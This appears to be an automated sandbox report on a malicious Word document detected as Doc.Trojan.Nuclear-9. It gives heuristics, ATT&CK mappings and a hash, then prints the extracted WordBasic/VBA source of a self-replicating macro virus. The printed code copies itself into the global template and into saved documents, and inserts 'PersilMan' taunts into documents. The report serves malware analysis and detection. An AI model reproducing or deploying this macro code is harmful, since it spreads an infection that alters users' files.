MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_AUTOOPEN. The AutoOpen macro in the 'macros.bas' script is designed to copy itself and other macros to the current document, suggesting an attempt to spread or establish persistence. The presence of 'Nuclear.T.DOK' in the document body and the ClamAV detection 'Doc.Trojan.Nuclear-9' strongly suggest malicious intent, likely related to macro-based malware.
Heuristics (4)
- ClamAV: Doc.Trojan.Nuclear-9 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Nuclear-9
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17372 bytes |

SHA-256: fe51c7647420875b1780f181f1f4c36eaf33c10f6febf66af5f6aabe24e8cbcb

Detection
- ClamAV: Doc.Trojan.Nuclear-9
- Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FilePrintDefault"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Prints the active document using the current defaults"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrintDefault.MAIN"
WordBasic.Call "PersilMan"
WordBasic.FilePrintDefault
End Sub
Attribute VB_Name = "FileSaveAs"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Busted
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If (dlg.Format = 0) Or (dlg.Format = 1) Then
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[WindowName$]() + ":AutoExec", 0
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[WindowName$]() + ":AutoOpen", 0
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[WindowName$]() + ":FileSaveAs", 0
WordBasic.MacroCopy "Global:FilePrint", WordBasic.[WindowName$]() + ":FilePrint", 0
WordBasic.MacroCopy "Global:FileOpen", WordBasic.[WindowName$]() + ":FileOpen", 0
WordBasic.MacroCopy "Global:FilePrintDefault", WordBasic.[WindowName$]() + ":FilePrintDefault", 0
WordBasic.MacroCopy "Global:PersilMan", WordBasic.[WindowName$]() + ":PersilMan", 0
WordBasic.MacroCopy "Global:ClearKepek", WordBasic.[WindowName$]() + ":ClearKepek", 0
dlg.Format = 1
End If
WordBasic.FileSaveAs dlg
GoTo EndIt
Busted:
Rem If Err <> 102 Then
Rem FileSaveAs dlg
Rem EndIf
EndIt:
End Sub
Attribute VB_Name = "ClearKepek"
Public Sub MAIN()
Rem Do kust nothing
End Sub
Attribute VB_Name = "PersilMan"
Public Sub MAIN()
If WordBasic.Month(WordBasic.Now()) > 4 And WordBasic.Day(WordBasic.Now()) > 20 Then
If WordBasic.Second(WordBasic.Now()) > 55 Then
WordBasic.EndOfDocument
WordBasic.Insert Chr___() '$11
WordBasic.Insert "PersilMan will take his revenge"
WordBasic.Insert Chr___() '$11
WordBasic.Insert "you will be cleaned up by PersilMan, SOON"
WordBasic.StartOfDocument
End If
End If
End Sub
Attribute VB_Name = "FilePrint"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Prints the active document"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrint.MAIN"
WordBasic.Call "PersilMan"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FilePrint(False)
WordBasic.CurValues.FilePrint dlg
WordBasic.Dialog.FilePrint dlg
WordBasic.FilePrint dlg
End Sub
Attribute VB_Name = "FileOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Opens an existing document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen dlg
WordBasic.Dialog.FileOpen dlg
WordBasic.FileOpen dlg
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
If IfNotInstalled = 0 Then
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExec", "Global:AutoExec", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoOpen", "Global:AutoOpen", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FileSaveAs", "Global:FileSaveAs", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FilePrint", "Global:FilePrint", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FileOpen", "Global:FileOpen", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FilePrintDefault", "Global:FilePrintDefault", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":PersilMan", "Global:PersilMan", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ClearKepek", "Global:ClearKepek", 0
End If
WordBasic.Call "ClearKepek"
End
... (truncated)